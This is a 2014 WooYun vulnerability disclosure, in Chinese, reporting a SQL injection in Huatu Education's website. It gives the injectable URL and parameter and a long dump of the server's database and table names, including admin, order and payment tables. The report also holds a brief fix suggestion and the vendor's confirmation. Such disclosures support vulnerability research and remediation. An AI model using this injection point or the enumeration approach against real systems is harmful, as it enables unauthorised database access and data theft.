漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-076984
漏洞标题:华图教育SQL注入漏洞
相关厂商:华图教育
漏洞作者: 第四维度
提交时间:2014-09-23 10:23
修复时间:2014-11-07 10:24
公开时间:2014-11-07 10:24
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-23: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商已经确认,细节仅向厂商公开
2014-10-04: 细节向核心白帽子及相关领域专家公开
2014-10-14: 细节向普通白帽子公开
2014-10-24: 细节向实习白帽子公开
2014-11-07: 细节向公众公开
简要描述:
SQL注射。希望没有重复提交!!!能过一个吗?
详细说明:
注入点:http://1dui1.huatu.com/index.php/FaceList/index/?province=14
GET类型注入。
available databases [11]:
[*] HTOL_Card
[*] HTOL_DaSai
[*] HTOL_Study
[*] HTOLMain
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: pubs
[12 tables]
+-----------------------------+
| authors |
| bin_dir |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| titleauthor |
| titles |
+-----------------------------+
Database: HTOLMain
[44 tables]
+-----------------------------+
| 360cps |
| AliPay_Cash_Log |
| Branch_School |
| Card_Msyy |
| ChunJie_YouhuiInfo |
| Cl_Admin |
| Cl_Ads |
| Cl_Announce |
| Cl_Article |
| Cl_BankrollItem |
| Cl_CardFree |
| Cl_CardFreeNum |
| Cl_Channel |
| Cl_Class |
| Cl_Comment |
| Cl_ConsumeLog |
| Cl_Course_Price |
| Cl_CreateFiles |
| Cl_DeliverItem |
| Cl_DeliverType |
| Cl_Favorite |
| Cl_Friend |
| Cl_Guest |
| Cl_Js |
| Cl_Keyword |
| Cl_Label |
| Cl_LinkClass |
| Cl_LinkConfig |
| Cl_LinkSite |
| Cl_MKCard |
| Cl_Message |
| Cl_Movie |
| Cl_NoDownLoad |
| Cl_Order |
| Cl_Order_History |
| Cl_acclog |
| activelink |
| bishi_StudentInfo |
| choujiangKU |
| choujiangMD |
| choujiangMD2 |
| city |
| cl_list |
| cl_newpermissions |
+-----------------------------+
Database: master
[12 tables]
+-----------------------------+
| MSreplication_options |
| dtproperties |
| monitor20140321 |
| spt_datatype_info |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
+-----------------------------+
Database: Northwind
[13 tables]
+-----------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Orders |
| Products |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Order Details |
+-----------------------------+
Database: msdb
[77 tables]
+-----------------------------+
| RTblClassDefs |
| RTblClassExtension |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systaskids |
+-----------------------------+
漏洞证明:
修复方案:
防注入,过滤敏感字符。
版权声明:转载请注明来源 第四维度@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-09-24 08:43
厂商回复:
感谢您对华图教育的关注与支持,正在进行漏洞修复。
最新状态:
暂无